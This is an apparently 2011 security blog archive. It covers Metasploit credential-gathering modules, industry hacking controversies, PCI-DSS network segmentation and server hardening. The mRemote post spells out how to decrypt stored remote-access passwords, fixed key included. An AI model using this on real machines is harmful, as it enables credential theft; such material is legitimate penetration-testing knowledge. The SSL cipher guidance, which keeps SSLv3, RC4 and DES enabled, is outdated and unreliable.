Build Railgun support for the Windows Crypto API(CAPI)
Finish my SmartFTP password recovery module
Build Meterperter NetStat support for Windows
Some other things that have not solidifed yet.

I hope to get those first 3 items completely done in the next month or so. I want to have them completed and committed before Black Hat. It looks like i will be attending Black Hat courtesy of Rapid 7 this year, but only for the briefings. I unfortunately do not have the means at my disposal to stay for DefCon this year. I look forward to meeting some people in person.

Stealing Passwords from mRemote

2011-06-02T20:59:00.000-07:00

If you don't know mRemote is a tabbed remote connection manager for Windows. It can store and manage a number of different connections, chief among them RDP,VNC, and SSH. It is a popular tool among IT Support people who have to remote into a lot of machines.

When you save connections in mRemote it outputs all of that data into an XML report in your local AppData folder. The passwords are saved in an encrypted format, however this is trivial to circumvent. The passwords are encrypted with AES-128-CBC Rijndael Encryption, and then the IV is pre-pended to the encoded passwords and the whole thing is base64 encoded for output into the XML. The encryption key that is used is the md5 hash of the string "mR3m". So to decrypt these passwords we follow a simple process:

example password: 28kQ15DF4kdW34Mx2+fh+NWZODNSoSPek7ug+ILvyPE=

Get the md5 hash of mR3m and convert it into byte values: \xc8\xa3\x9d\xe2\xa5\x47\x66\xa0\xda\x87\x5f\x79\xaa\xf1\xaa\x8c
base64 decode the saved password data
Take the first 16 bytes of the decoded data and set that as you Initialization vector(IV)
Run AES-128-CBC Decryption feeding your Cipher Text(the remaining bytes from the decoded text), your IV (that first 16 bytes), and your key (\xc8\xa3\x9d\xe2\xa5\x47\x66\xa0\xda\x87\x5f\x79\xaa\xf1\xaa\x8c)
You should get a decrypted password of: password1

Simple and easy, you are now ready to decrypt all of those delicious RDP,VNC, and SSH passwords. To make it all that much easier I have written a new Metasploit POST module that will find the XML files on a compromised machine and decrypt those passwords for you. I just submitted it to Redmine so it hasn't been added yet, but keep your eyes peeled. I suspect it will be in there soon.

Metasploit Meterpreter Registry OpenKey and VNC PW Module

2011-05-01T20:38:00.000-07:00

As you probably already know I've been doing some work with Metasploit post modules. This recent work has focused heavily on Registry functions. While doing this work I noticed a disturbing behavior. When Meterpreter checks to see if a key exists it was calling RegCreateKey instead of RegOpenKey. RegCreateKey will attempt to create any and all keys in the supplied path that do not already exist. RegOpenKey, however, will not create the key if it doesn't already exist.

In Metasploit the registry.rb 'client-side' function is set up as a wrapper to the create_key function. Similarly the registry.c code for Meterpreter itself is set up this way. Calls to the OpenKey function were just passed on to the create_key function. I have now submitted a patch to correct this behaviour. The registry.rb function now sends a call via the meterpreter stdapi to the request_registry_open_key function. The request_registry_open_key function will appropriately call RegOpenKey instead. If/when this patch is accepted by the Metasploit team, it will make the Registry functions of Meterpreter much less invasive/noisy.

I have also gone ahead and submitted a patch for the enum_vnc_pw Post Module. The module as it currently stands will check the HKEY_Current_User keys for user-mode vnc passwords. However, this will only work if meterpreter is running udner the permissions of the user who is running the vnc server. I have added behaviour that will try to enumerate all userswith SIDs in HKEY_Users and then check each one that it can access, to see if it has stored VNC passwords. The get_reg function also had to be re-written to deal with possibile permissions issues if meterpreter does not have rights to access each users' registry. The best way to run this module will, of course be under SYSTEM priveleges as it will have access to every user. This will hopefully make the enum_vnc_pw module more effective at gathering it's data.

Sony PSN Hack: Leave GeoHot out of it

2011-04-29T04:46:00.000-07:00

So I wandered by Geohot's latest place of residence today. I thought his posting was very well written and very nicely defined his stance. His work on opening up homebrew software on the PS3 was not aimed at enabling piracy, and he does not support or condone the PSN hack in any way. Despite this, he is flooded by comments blaming him either directly or indirectly for the hack. The level of ignorance in this matter is astounding. After two decades on the internet, you'd think I would not be surprised at this point, but I still am. I suppose i just can't shake this pesky hope in humanity.

I want to lay this out in terms that, hopefully, even the dumbest internet denizen can understand:

George Hotz , Fail0verflow and any other Homebrewers did not support this attack. Their work was aimed to restore functionality that was stripped away from devices that they had bought specifically for that functionality. I wonder how many people would have bought a 360 instead of a PS3 if Sony hadn't advertised the OtherOS functionality. It was certainly one of the reasons I bought my first PS3. George hotz and these others did not perpetrate this attack
There is no evidence that this attack even had anything to do with the homebrew console debate. Consider the following.

If this was about revenge or embarrassing Sony, the attack would need to be public as quickly as possible to try and prevent Sony from sweeping it under the rug.
Nobody has come forward to take responsibility for the breach. Instead the information leaked out from Sony inevitably as they shut down their own service to get a handle on the Incident.
The breach targeted customer data including PII(Personally Identifiable Information) and potentially Credit Card Data. These are high value targets monetarily
The above mentioned lack of disclosure/credit taking is more indicative of someone looking to steal this data and sell it for profit
Some will try to argue that the attacker could have expected Sony to disclose the breach but that has two huge gaping holes. First, if Sony's security was poor enough to let the breach happen in the first place, why should there be any expectation that they have proper safeguards in place to alert them to the breach. They obviously believed they had no reason to ever expect an attack like this. Secondly, why assume Sony would even admit to the breach. Plenty of companies suffer these kinds of breaches and do not report them. It happens a lot more than you might think.

The point is, that there is no evidence to support the idea that this has anything to do with the home brew console debate. In fact the little bit of evidence we have so far points to a common data theft. To all of you people who are jumping on anonymous or any other media buzz right now, do some reading. these sorts of breaches happen all the time. This breach was essentially inevitable as long as Sony failed to correct the security flaws in their system. If you want somebody to blame you have two parties to go after: Sony, and the people who actually stole your data. Plenty of blame to go around, you can leave GeoHot out of it.

Stealing WinSCP Saved passwords

2011-04-27T07:36:00.000-07:00

WinSCP is a popular SCP and SFTP client for Windows. Users of this tool have the option of storing 'sessions' along with saved passwords. There is an option within WinSCP to encrypt these password with a 'Master password'. This means the stored passwords will be AES256 encrypted. However, this option is NOT turned on by default. There are two ways these sessions will be stored by WinSCP. The default behavior is to save them in the registry. They will be stored under HKEY_Current_User\Software\Martin Prikryl\WinSCP 2\Sessions. The other option is to store them in an INI file, which will be located in the WinSCP install path.

When no master password is set, it is trivial to reverse the 'encryption' used on the stored passwords. It is a simple series of bitwise operations, using the username concatenated with the host name as sort of pseudo-key. To simplify the process of stealing these passwords I have created a Metasploit Post module /modules/post/windows/gather/enum-winscp_pwds.rb which was committed in the latest revision.

Once again, I am pleased to be contributing to the Metasploit project. I want to take a moment to especially thank egyp7, hdm, and jduck for their help and support. they put up with a lot of dumb questions while I was working on this module. it is only the third one I have created and the second to get committed. The Metasploit team is an amazing group of people to work with. They freely share their knowledge and experience and make Metasploit truly a community driven project, instead of just another piece of OSS. I look forward to continuing to contribute to the Metasploit project.

Updated Metasploit wishlist

2011-04-12T12:47:00.000-07:00

A little while ago i posted my Metasploit Wishlist. i have pulled a new updated copy of this list, and added a Category field to help sort through it a little easier. I'll be spending some of my spare time going through this list and picking out things to port over. My first go around was a success and my first ported module:
http://metasploit.com/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid

was committed. It may have been a little sloppy but i look forward to getting better as I go on. Mark my words, I'm going to get my name on that front page list.

Here's the new list

Of Hacks, Leaks, and Legal Battles : Is anyone really winning?

2011-02-15T11:05:00.000-08:00

In recent days we have seen what seems like an escalation in the battle for the Information Age. These events are far from new, however they have taken on a more fevered pitch. I suppose it probably started with the whole WikiLeaks-Bradley Manning thing. This started quite a fierce fight both off and on the internet. A fierce debate with highly polarized sides sprang up around the issue of WikiLeaks.

Into that fray jumped Anonymous. They took their own unique sense of purpose and went after anyone whom they felt had wronged WikiLeaks. This included attacks on Paypal,MasterCard and others. They took time off from their busy schedule of attacking PirateBay opponents around the world. These sorts of things are not all too uncommon, especially when dealing with Anon. They have made the news in the past. What was different this time was that there was already a frenzy around the wikiLeaks issue.

Soon a new subset appeared. This group would have us believe that they are independently operating patriotic hackers, such as th3j35t3r. I have my doubts as to how independent these folks really are. These people went after anonymous, wikileaks and anyone else supporting them. A sort of mini-cyberwar started. What I would like to note is interesting is that the US Department of Justice launched an immediate investigation into Anonymous to try and make arrests over their DoS attacks. However the sophisticated DoS attack that was carried out against wikileaks was just as illegal and yet the government remains silent on the subject.

The fighting and debating raged on around wikileaks. Many things occurred during the next several months that i don't feel the need to recap. Fast forwarding to the past few weeks. Aaron Barr, CEO of HBGary Federal made an announcement that he had 'infiltrated' Anonymous and discerned the true identities of the Anon leadership. (This statement alone seems to show a misunderstanding of the true nature of Anonymous, but look at some of my earlier posts for some of my theories on this subject). Aaron Barr apparently sought to use this information to leverage himself and his company into a bit of the spotlight. Allegedly, Barr was going to sell this information to the FBI.

In response a few members of anonymous launched an assault on HBGary federal during the super bowl. In short order they ahd compromised systems inside HBGary Federal, took control of rootkit.com, seized Aaron Barr;'s twitter account and the social networking accounts of several other folks at HBGary. They stole a large number of emails from the company, and allegedly wiped out HBGary's backups.

The initial assault left HBgary reeling and embarrassed like a kid who gets pants-ed at the bus stop. It got worse from there though. Amongst the stolen emails was a document supposedly composed by HBGary Federal and Palantir. The target audience was allegedly Bank of America. The subject matter? How to destroy wikileaks. The document details disinformation campings, smear attacks against pro-wikileaks journalists, Denial of Service attacks against wikileaks infrastructure, and attempts to infiltrate the group to discover the identities of document submitters. You can see a copy of the document here. BofA and Palantir began moving quickly to conduct damage control disavowing any knowledge of the document or its creation. Additional documentation has surfaced to cast doubts on some of these claims.

The lesson here so far? Even a security firm like HB Gary can get thoroughly spanked on the internet by not taking threats seriously. The damage to their company by these leaks is yet to be seen, but other companies are already cutting ties to try and protect themselves. In this case the Leak has already proven to be an effective weapon against a powerful company.

Meanwhile, another little drama was unfolding. The Gregory Evans/ Ligatt Security drama. Gregory Evans has been accused of being a charlatan for a while. He made claims of being the 'world's no 1 Hacker'. A ridiculous, and pompous proclamation if ever I've heard one. He released a book on how to become the world's no 1 hacker. A book which was quickly accused of large scale plagarism. Evans denied these accusations, and at one point claimed that he paid any third part content writers for their material. I do not know about the vast majority of this claim. However, Chris Gates, aka carna0wnage was one of the authors whose material appeared in the book. Gates denied ever receiving any payment or giving permission to Evans to use his material in the book. The material is so obviously ripped off, Evans even sued the same screenshots which include Chris Gates' name in the login prompts.

Enough about the gory details though. Suffice it to say, the Evans/Ligatt drama continued on. Evans fought back in the only way he seems to know how. He filed lawsuits. He filed quite a few lawsuits actually. He tried suing anyone and everyone he could that has ever said anything bad about him on the internet. Most of these lawsuits have failed completely, but that didn't stop Evans. Recently, on Gregory Evans' birthday, his email and twitter accounts were hacked. All of his email was leaked into a torrent on the internet and distributed. Since the leak of his email, one embarrassing piece of evidence after another surfaces from the spool. Many of these documents were reposted to the LigattLeaks blog, which was originally hosted on WordPress. Evans and Ligatt sent take-down demands to wordpress and the registrar for LiogattLeaks.org. Wordpress capitulated in the face of any possible legal ramifications, whether there was solid legal basis or not.

LigattLeaks has since moved on to a site at http://ligattleaks.blogs.ru and continues to post with impunity. Since LigattLeaks themselves claim they do not possess the mailspool and are only reposting things found on pastebin, they seems to be under no legal liability. The actual consequences of these leaks for Evans or Ligatt? Aside from a lot of embarassment, and a local news story , there has yet to be any serious consequence seen from this. however, Evan's litigious assaults on the infosec community seemed to have had no real effect either. So right now I'm calling this one a draw at the moment.

Now let's move on to the Sony PS3 case. The folks over at Fail0verflow got their hands on the keys used to sign software for the ps3. Well known hardware hacker GeoHot then built on this and created a modkit to allow home brew software to run on the ps3. Sony claims that this will only serve to enable piracy on their game consoles. they file suit against Geo Hot, subpoena all of his computer equipment and issue orders for his instructional videos to be stripped from the internet. In response the instructions, examples, and encryption keys are spread across the internet. Before the case against Geohot has even begun, sony is now trying to use the legal system to gain information on every person who viewed or commented on GeoHot's video on youtube. They are also seeking legal action against anyone who posts the encryption keys. This drama is still under way but I'm going to go ahead and call it now: Sony will lose, no matter what the trial outcome.

There is already a huge public outcry against Sony over this action. They may have already caused themselves irreparable brand damage. They have increased the actual awareness of these hacks. And there is no way that they can successfully suppress the information once it has begun disseminating through the internet. They are trying to stuff the proverbial Geenie back in the bottle. One has to wonder why they are doing this. They will not be able to recoup any significant losses. they won't be able to suppress the information. They are trying to lay down intimidation tactics. These intimidation tactics are of course having the opposite effect. One has to wonder if anonymous or another group won't turn it's attention towards the Sony mega-corporation. It would be very itneresting to see a battle between Anonymous and such a huge company.

There are three examples of folks in the Corporate world trying to control and shape the Internet for their own benefit. All of them are failing miserably, and they are all starting to pay a heavy price for it.

PCI-DSS : You gotta Keep Em Separated!

2011-02-11T12:53:00.000-08:00

I turn to the Offspring for a bit of lyrical wisdom in terms of my latest PCI-DSS ramblings. All humour aside, please pay attention to what I am about to tell you. I cannot stress this enough:

The number one thing you should focus on for PCI-DSS is Network Segmentation. If you do not employ proper network segmentation, your PCI compliance efforts will be painful at the best, and a disaster at the worst.

Maybe your company already handles HIPPA/HITECH or SOX. Maybe you have had some other security initiatives running for a while. That's great. PCI-DSS is a very different game, and if you don't segment your network, you will drown in work.

You may have other confidentiality requirements in place. You may be tempted to place HIPPA Data or sensitive financial data in the same network segments as your PCI data. I am telling you now, resist that temptation. It may seem like a perfectly reasonable approach, but it should be avoided if possible.

With proper segmentation of your networks, you give yourself the opportunity to approach your goals in a phased risk-based approach. This will help maximize your efficiency when try to achieves these goals, and will also ensure that you are adding the most possible security benefit at each step of the process.

Completion of this Network Segmentation depends upon some sort of systems Inventory Process. You need to be aware of exactly what is in your environment, how they interact, and what their roles are. Without this, you will fail to segment your network properly and will never be able to truly add meaningful security as a whole.

Let's say that you have three primary Information Security concerns. PCI,HIPPA, and SOX. This means you are concerned with 4 primary data classifications:

1.PCI Data (Credit Card #s , Expiration Dates, CCVs etc)

2.PII/HIPPA Data ( Any personally identifieable information and healthcare data)

3.Financial Reporting Data

4.Everything Else

Let's talk about a perfect scenario where you are a fairly sizable company, and you have a solid budget for this security initiative you are undertaking. That being said, we will go ahead and break down #4 into some additional categories that will help with your overall security posture

1.Critical Infrastructure (Servers and Network Devices that are responsible for core business applications and services. i.e. Email, Telephony, Primary Line of business applications etc)

2.Desktop Ranges (where all of your users should be sitting)

3.QA/DEV Environments (Even if you are not doing any in-house development, you should have some QA environments to test things like configuration changes. Keeping these separate is important for a number of reasons we will get into later)

4.Non-Critical systems (everything else)

So now we essentially have 7 distinct areas mapped out. Let's talk a bit more about each of these areas.

PCI Data – This area will include any device that Stores, Processes, or Transmits Credit Card data as defined by the PCI-Council. In our scenario, this is the area that is going to be subject to some of the most stringent security requirements. This area should be strongly separated from all of the other regions, permitting as little contact between these networks and any others as possible. The rule of thumb should be Deny by Default. These hosts will all be subjected to regular vulnerability scanning and penetration testing efforts. Any applications hosted in this environment should be subject to source code review and Application Security Assessments.

Within the PCI environment, the hosts should be further separated where possible. Any external(Internet) facing Presentation layer should be strongly segmented away from the Application and Data layers. This is to try and mitigate the chances that your presentation layer will be sued as an entry vector deeper into the environment.

PII/HIPPA Data – This area is going to be a concern from a regulatory standpoint as well. However, HIPPA's guidelines on security requirements are nowhere near as stringent as those set forth by PCI. Your company should create a set of standards and ensure that they are applied against all hosts in this environment. These standards should include topics like Access Control, Encryption (transport and at rest), approved applications, approved services etc. The environment should be audited regularly to ensure that these standards are being upheld. Regular vulnerability scans should be a priority in this environment as well. Code Reviews, Application Security Assessments and penetration tests should be a goal, but should take a lower priority to completing these same tasks within the PCI environment.

It is possibly even more important that the External facing Presentation Layer be segmented off from the rest of the environment here. This is because any Internet facing hosts are in-scope for PCI external vulnerability scanning and penetration testing. If you do not segment the rest of the PII zone off, you can quickly find this entire zone considered in scope for PCI as well. This will mean that you will now be required to enforce the same standards on this environment that you do in the PCI Zone. This may not seem like a bad thing, but the work load can get out of hand quickly.

Financial Reporting Data – This is the zone where your SOX standards come into play. SOX is, in my experience, one of the most vague sets of standards out there. It mandates that Financial reporting data be secured to maintain accuracy and integrity. The big concern in this Zone can be summed up in a word : Accountability. If we apply the CIA model(Confidentiality, Integrity, Availability) to this Zone, we will see that Integrity is our number one concern, followed by Integrity, and Availability come in a very distant third.

What you should focus on:

· User Account Management

· Access Control

· Auditing/Activity Monitoring

The focus here is going to be a lot more process oriented than technical. Ensure that user accounts are set up properly on all systems, with only the access they need. Make sure there is no sharing of accounts, or use of generic accounts. Make sure that activity on all Financial Reporting systems is logged for auditing to maintain maximum accountability.

Regular audits should be done on this zone to ensure all standards and policies are being properly observed within the zone. Regular vulnerability scanning in this Zone may be a good idea, but is not a must. If time and resources allow Source Code Review, Application security Assessments, and Penetration Tests should be performed to help validate the security mechanisms in place.

Like the other zones, any Internet facing Presentation Layer should be segmented from the rest of the zone as much as possible. Remember, all Internet facing hosts are subject to PCI.

Critical Infrastructure – The separation of this Zone is probably going to be less dramatic than with the ones we’ve just discussed. It is still a good idea to tightly control the flow of data in and out of this zone though. Regular Vulnerability scans should be performed in this Zone, but only after the above Zones have reached a point in their maturity where the Vulnerability Management efforts are running smoothly. That will allow you to have time for working with System Admins on remediating any findings. Availability may be a much larger concern in this Zone than in some of the others. This zone represents the core of your operations and should be treated carefully. In addition to the Vulnerability Scans, Penetration Testing efforts are a very good idea in this zone.

Do I need to say it again? Any Presentation Layer facing the Internet needs to be additionally segmented. I think you’ve probably got this idea down pat by now.

Desktop Ranges – Desktop networks are a tricky subject. They should be segregated out as much as possible for a couple reasons. One is that you don’t want a compromise of the outer systems to be able to get into the Desktop networks and run amok. Secondly, you don’t want the opposite to happen. Desktop ranges are honestly going to be the most likely entry vector into your network. A lot of attacks on companies start by tricking users into going to web page, or opening a file that they shouldn’t. If your desktop users have unfettered access, then it is game over.

I cannot stress the importance of applying standards here. Some chief things to think about when looking at standards for your Desktop networks:

1. Approved Software – Make sure you know what software is safe to run on machines, and don’t allow any other software to be installed without authorization.

2. Update management – Make sure that all approved software can be updated in a controlled and uniform manner.

3. File Shares – In my experience as Penetration Tester, this is where you see the most heinous failures. Users often open up shares on their computers to trade files back in forth. The problem is that they do not necessarily know how to secure those shares properly

4. Running Services – If your desktops are all running Windows Messenger or Chargen, you better have a good reason for it. Aside from these obvious concerns, also think about things like Remote Registry. Remote Registry allows for a lot of troubleshooting and remote administration, but it also opens potential security risks. Weigh the benefits and risks accordingly for your environment.

5. Anti-virus – I don’t think I need to explain this.

6. Account Policies – Password complexity, expiration, and lockout policies. Also policies on shared or generic accounts. This also applies to the Local Administrator account. If all of your Desktops run with the same local Admin password, it will only take one Desktop being compromised for this entire Zone to be in danger.

Vulnerability scanning on Desktop ranges is not an easy decision point. There are benefits and risks associated with this activity. As previously stated, the Desktops are going to be one of your most likely entry vectors for an attack. However Vulnerability scans can be potential disruptive, and if you are doing Authenticated scans, you may return a lot more results than you are going to want to look at. If you decide to do Authenticated Vulnerability scans, it will be very important that you have items 1 and 2 from above firmly in place first.

There really shouldn’t be anything to do in terms of Sources Code Review, or AppSec Assessments here. Penetration Test efforts will almost certainly have a field day in this zone. If there is anything directly Internet facing in this Zone you have done something horribly horribly wrong!

Non-Critical infrastructure – Let’s jump to the ‘Everything Else’ group for a second. This is going to be all of your non-critical systems. These are the things that don’t handle sensitive data, and are not required for day-to-day operations to succeed. The separation of this zone should be defined by the separation and controls placed around all of the other zones. No additional work should be required for separating these hosts out. All of your security activities such as Vulnerasbility Scanning, Penetration Testing, AppSec Assessments, and Code Reviews should all be long term goals. Start working on these only after everything is running smoothly in all of these other zones. This is the point at which you’re just cleaning up the rest of the garbage in your Enterprise. If you get to the point where you are cleaning up this Zone you are well on your way to the sustainment phase of your overall Security Initiative.

QA/DEV Systems – QA and DEV environments are a quagmire. The best advice I can give you is as follows.

· Separate QA and DEV out from the rest of your environment as much as possible.

· Try to avoid any contact between QA/DEV and the internet.

· Do not ever allow real production data to reside within a QA or Development Zone.

· Do NOT Vulnerability Scan your QA and Dev environments. These zones will be extremely volatile, and will be in a constant state of flux. You will be bogged down chasing vulnerabilities that disappear and reappear at random. If you have segregated these zones appropriately, there is nothing to be gained from Penetration Testing or Vulnerability Scanning in this Zone. Save yourself the headache.

Below is a crude diagram to try and help illustrate this concept. Please note that this does not reflect actual firewall or network placement. It merely tries to illustrate the segmentation.

Metasploit Framework Wishlist

2011-02-10T09:46:00.000-08:00

Hello World!

I thought I would share something I have put together. I cross-referenced data about vulns inside http://www.exploit-db.com/ with data on whether those same vulnerabilities had a known exploit module inside the Metasploit Framework. Some of these vulnerabilities are probably quite old, and some of them not very relevant. That being said, if you are looking for some modules to contribute to the Metasploit project, this might be a good place to start.

A couple of caveats:

I, in no way, represent Rapid 7 and the development team for Metasploit. I created this list for my own use to try and contribute, and am sharing the list in that spirit.
The links from exploit-db create PoCs/Exploits that somebody worked hard on. If you port it to metasploit please remember to give credit to the original exploit author. They did all the hard work.

The List is Here

Ligatt Security Breach - Gone too far

2011-02-04T16:05:00.000-08:00

The latest development in the Gregory D Evans/Ligatt Security internet drama has gotten me thinking. For anyone who might not be familiar with what this is all about, I suggest you check out a few resources on the subject:
http://attrition.org/errata/charlatan/gregory_evans/
http://www.theregister.co.uk/2010/06/22/worlds_no_1_hacker/
http://packetstormsecurity.org/news/view/18569/Gregory-D.-Evans-Tried-To-Subpoena-Security-Researchers-Passwords.html
and a must read at: https://365.rsaconference.com/blogs/securityreading/2010/06/10/how-to-become-the-worlds-no-1-hacker

In case you buy any of Gregory Evans' claims that he had permission to use those works, Chris Gates also known as carnal0wnage has publicly said that he never gave Evans permission and never received money from Evans. The saga is long and drawn out, and I won't rehash it here.

The latest development is that Evans and Ligatt Security were breached this week. Someone compromised his computer, and with it his email and twitter accounts. It seems two of his websites may also have been brought down as part of this attack. The simple fact of the matter is that this action was unacceptable. Apparently among the released information was the personal information of a lot of innocent people, including social security numbers, bank accounts, and routing numbers. Now let me clarify this even more. Even if it was only Gregory Evans personal information, this would be unacceptable. Mr. Evans has a lot to answer for, but even he does not deserve to have his important personal information exposed in such a manner. This can be seen as nothing more than a violation of people's rights to privacy, no matter how much you might not like them. Those of us who are security professionals have made it our jobs to stop or prevent such violations from happening. The thought that such an attack may have come from within the InfoSec community is a worrisome one.

I will admit in a moment of human weakness I allowed myself to be glad of this news. That is a terrible thing, and upon reflection I find it a little embarrassing. The Internet has a power to take any disagreements or arguments and magnify them out of control until all pretense of civility is slowly eroded away and we are left with a monstrosity that no longer serves any purpose but to sustain itself. I see the examples of this in the recent Penny Arcade 'scandal' as well as the Ligatt drama. If we are past the point of behaving like mature rational beings it is time for us to absent ourselves from the discussion. Toward that end I would like to point out the posts I have seen by two people Matt Jezorek and Sam Bowne. Their articles are well thought out and examples of clear rational thinking, despite Sam Bowne's own involvement in this saga. These are the people we should want speaking for us, and those of us who can add nothing better than what they already are(myself included) should probably just sit down and shut up now.

That is all.

Perl Tip: finding module path

2011-01-25T11:32:00.000-08:00

I thought I'd share a little Perl Tip/Trick that saves me a lot of trouble. Say you have a perl module installed and you need to make a correction to the source code. For some reason you can't find where the module installed to though. You could spend time using 'find' searching through folders or do this:

perl -M'Data::Dumper' -M'' -e 'print Dumper(\%INC)'

This will dump all the modules loaded out to screen for you. You can of course pipe this into grep to look for the specific module or modules you want. You will then get the path.

Observe:

c0malod@Takeshi:/Tools$ perl -M'Data::Dumper' -M'Time::HiRes' -e 'print Dumper(\%INC)'
$VAR1 = {
   'warnings/register.pm' => '/usr/share/perl/5.10/warnings/register.pm',
   'bytes.pm' => '/usr/share/perl/5.10/bytes.pm',
   'XSLoader.pm' => '/usr/lib/perl/5.10/XSLoader.pm',
   'Carp.pm' => '/usr/share/perl/5.10/Carp.pm',
   'Exporter/Heavy.pm' => '/usr/share/perl/5.10/Exporter/Heavy.pm',
   'vars.pm' => '/usr/share/perl/5.10/vars.pm',
   'strict.pm' => '/usr/share/perl/5.10/strict.pm',
   'Time/HiRes.pm' => '/usr/lib/perl/5.10/Time/HiRes.pm',
   'Exporter.pm' => '/usr/share/perl/5.10/Exporter.pm',
   'warnings.pm' => '/usr/share/perl/5.10/warnings.pm',
   'AutoLoader.pm' => '/usr/share/perl/5.10/AutoLoader.pm',
   'overload.pm' => '/usr/share/perl/5.10/overload.pm',
   'Config.pm' => '/usr/lib/perl/5.10/Config.pm',
   'DynaLoader.pm' => '/usr/lib/perl/5.10/DynaLoader.pm',
   'Data/Dumper.pm' => '/usr/local/lib/perl/5.10.1/Data/Dumper.pm'
   };

OR:

c0malod@Takeshi:/Tools$ perl -M'Data::Dumper' -M'Time::HiRes' -e 'print Dumper(\%INC)' | grep 'HiRes'

'Time/HiRes.pm' => '/usr/lib/perl/5.10/Time/HiRes.pm',

Simple little trick, but it works wonders. Cheers.

Two must haves for PCI-DSS

2011-01-21T05:16:00.000-08:00

For better or worse, my life revolves around PCI-DSS these days. As I move along through the realm of PCI-Compliance, I thought I would start sharing some observations. I am going to start today with two standards that should be implemented to save you a lot of time and energy. If you have these in place before you start your vulnerability scanning, you won’t have to deal with an avalanche of results from these issues.

1. Disable SSHv1 Support. Version 1 of the SSH protocol is prone to a number of issues. For this reason, it has been essentially abandoned in favour of SSHv2. I have included instructions for disabling SSHv1 in a few of the more common setups.

a. OpenSSH

i. Edit the sshd_config file. This file is normally located in /etc/ssh/ .

ii. Change the line that reads Protocol 1,2 so that it instead reads Protocol 2

iii. Restart the SSHD Service

b. Cisco

i. Enter the command ip ssh version 2

ii. This will enable SSH v2 and disable SSH v1 when SSH is already configured.

c. F5 Big-IP 4.x

i. Log in to the BIG-IP command line.

ii. Change directories to the /config/ssh directory by typing the following command:

iii. cd /config/ssh

iv. Use a text editor to edit the sshd_config file.

v. Edit the Protocol entry used to configure the SSH versions supported by sshd daemon by replacing #Protocol 2,1with Protocol 2.

vi. Save the sshd_config file.

vii. Restart sshd by typing the following command:

viii. bigstart restart sshd

2. Enforce Strong SSL Encryption. There is a little more to this step than the previous one. Enforcing strong Cryptographic standards in general is extremely important. Right now we’re just going to talk about how to enforce proper usage of SSL on IIS and apache web servers.

a. Apache 2.x

i. Disable SSL 2.0 support

ii. Disable weak ciphers

iii. Disable MD5 Hashing for MAC

iv. Disable Null Authentication

v. To accomplish this include the following lines in the httpd.conf file:

· SSLProtocol –ALL +SSLv3 +TLSv1

· SSLCipherSuite ALL:!aNULL:!ADH:!eNULL:!LOW:!MD5:!EXP:RC4+RSA:+HIGH:+MEDIUM

b. Windows/IIS

i. Enforce the use of SSL 3.0 and TLS by disabling support for PCT 1.0 and SSL 2.0

1. Find HKey_Local_Machine\System\CurrentControlSet\Control\SecurityProviders \SCHANNEL\Protocols\PCT 1.0\Server in the registry

2. Add a new DWORD called ‘Enabled’ and set this to 0x00000000

3. Find HKey_Local_Machine\System\CurrentControlSet\Control\SecurityProviders \SCHANNEL\Protocols\SSL 2.0\Server

4. Add a new DWORD called ‘Enabled’ and set this to 0x00000000

ii. Disable all weak(less than 128-bit) ciphers

1. Add a DWORD value called “Enabled”, set to 0x000000 to the following keys:

2. SCHANNEL\Ciphers\RC4 128/128

3. SCHANNEL\Ciphers\RC2 128/128

4. SCHANNEL\Ciphers\RC4 64/128

5. SCHANNEL\Ciphers\RC4 56/128

6. SCHANNEL\Ciphers\RC2 56/128

7. SCHANNEL\Ciphers\RC4 40/128

8. SCHANNEL\Ciphers\RC2 40/128

9. SCHANNEL\Ciphers\NULL

iii. Add a DWORD value called “Enabled”, set to 0xffffffff to the following keys:

1. SCHANNEL\Ciphers\DES 56/56

2. SCHANNEL\Ciphers\Triple DES 168/168

3. SCHANNEL\KeyExchangeAlgorithms\PKCS

iv. Enforce the use of SHA hashes instead of MD5

1. Add a DWORD value called “Enabled”, set to 0x000000, to SCHANNEL\Hashes\MD5

2. Add a DWORD value called “Enabled”, set to 0xffffffff, to SCHANNEL\Hashes\SHA

v. A reboot of the Machine is now required for the changes to take effect.

These two little things can save you a huge amount of work if you implement them. When you go to run a PCI-DSS mandated vulnerability scan, these items will trip you up if you’re not careful. Get them implemented early; have them set as a standard, and save yourself a lot of headache.

Shameless Self Promotion

2011-01-14T10:36:00.000-08:00

A little bit of shameless self-promotion. The good folks over at TechJournal South saw fit to publish an article by yours truly. The article is a counter-point to some of the nonsense being talked about bug bounties. Check out the first part of it here. Stay tuned for part two next week. Special thanks to the good people at Tech Journal South for giving me this opportunity. I ope to get a chance to work with them again in the future.

Security Researchers: Heroes or Vigilantes?

2011-01-03T12:29:00.000-08:00

This is a touchy subject, especially for me. It is, however, one that I feel needs to be discussed. Michal Zalewski just put out an amazing announcement this weekend. He has created a new DOM fuzzer for testing Web Browsers, and has unsurprisingly turned up some interesting results. My first reaction to this is of course "Zalewski is the man!". I think this for a couple of reasons. Firstly, for creating this fuzzer. Secondly for tracking the flaws through the complex space of web browser. And finally for releasing the tool for the rest of us wannabes to get our grubby little hands on.

It has taken very little time for the criticism to start trolling...*ahem* rolling in. I want to take a moment to discuss this article before we move on. The authour posits that it is 'suspicious' that the posting mentions webkit browsers without explicitly stating that this includes Safari and Chrome. The implication is that their is some impropriety on the part of google, trying to downplay it's own weakness. Let's take an alternative view for a second though.

Browser	Rendering Engine
Chrome	Webkit
Safari	Webkit
Internet Explorer	Trident
Firefox	Gecko
Opera	Presto

So what we see here, is a breakdown of the popular browsers and the rendering engines used. Internet Explorer, Firefox, and Opera each use their own rendering engines. IE's Trident and Opera's Presto are proprietary systems, while Gecko is open source but is maintained by Mozilla.

So why is it fairly honest to say Webkit instead of Safari and Chrome? Chances are that the bug actually resides in the Webkit engine and is thus the responsibility of the Webkit project team to correct. To claim the bug as being a fault of either the Safari or Chrome development teams, in this scenario would be actually less honest and unfair to those development teams. furthermore, msot people who are fans of Safari or Chrome already know that Webkit means their browser of choice. By the reverse of this it does not, however, make sense to specifically call out the other browsers by their rendering engines. Most people would have no idea what you mean if you told them there was a problem with the Trident Rendering Engine. Seeing as how it falls under the purview of the same company, it also does not accomplish anything to make such a distinction. So there is nothing underhanded about Mr. Zalewski saying Webkit instead of Chrome, he's just being factual.

